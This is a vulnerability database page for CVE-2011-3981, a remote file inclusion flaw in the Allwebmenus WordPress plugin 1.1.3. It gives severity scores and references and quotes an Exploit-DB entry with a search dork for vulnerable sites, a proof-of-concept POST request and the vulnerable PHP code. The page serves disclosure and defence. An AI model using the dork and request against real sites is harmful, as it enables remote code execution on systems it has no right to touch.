CVE-2011-3981 : Detail

CVE-2011-3981

Code Injection
A03-Injection
1.91%V3
Network
2011-10-04
08h00 +00:00
2017-08-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP remote file inclusion vulnerability in actions.php in the Allwebmenus plugin 1.1.3 for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the abspath parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 17861

Publication date : 2011-09-18 22h00 +00:00
Author : Ben Schmidt
EDB Verified : No

# Exploit Title: Allwebmenus Wordpress Menu Plugin Wordpress plugin RFI # Google Dork: inurl:wp-content/plugins/allwebmenus-wordpress-menu-plugin # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/download/ # Version: 1.1.3 (tested) --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php POST="abspath=RFI" --- Vulnerable Code --- /** Loads the WordPress Environment and Template */ if (!isset($_POST["abspath"])) die(); require_once(urldecode((string) $_POST["abspath"].'wp-blog-header.php'));

Products Mentioned

Configuraton 0

Likno>>Allwebmenus_plugin >> Version 1.1.3

    Wordpress>>Wordpress >> Version *

    References

    http://www.securityfocus.com/bid/49685
    Tags : vdb-entry, x_refsource_BID
    http://www.exploit-db.com/exploits/17861
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://secunia.com/advisories/46068
    Tags : third-party-advisory, x_refsource_SECUNIA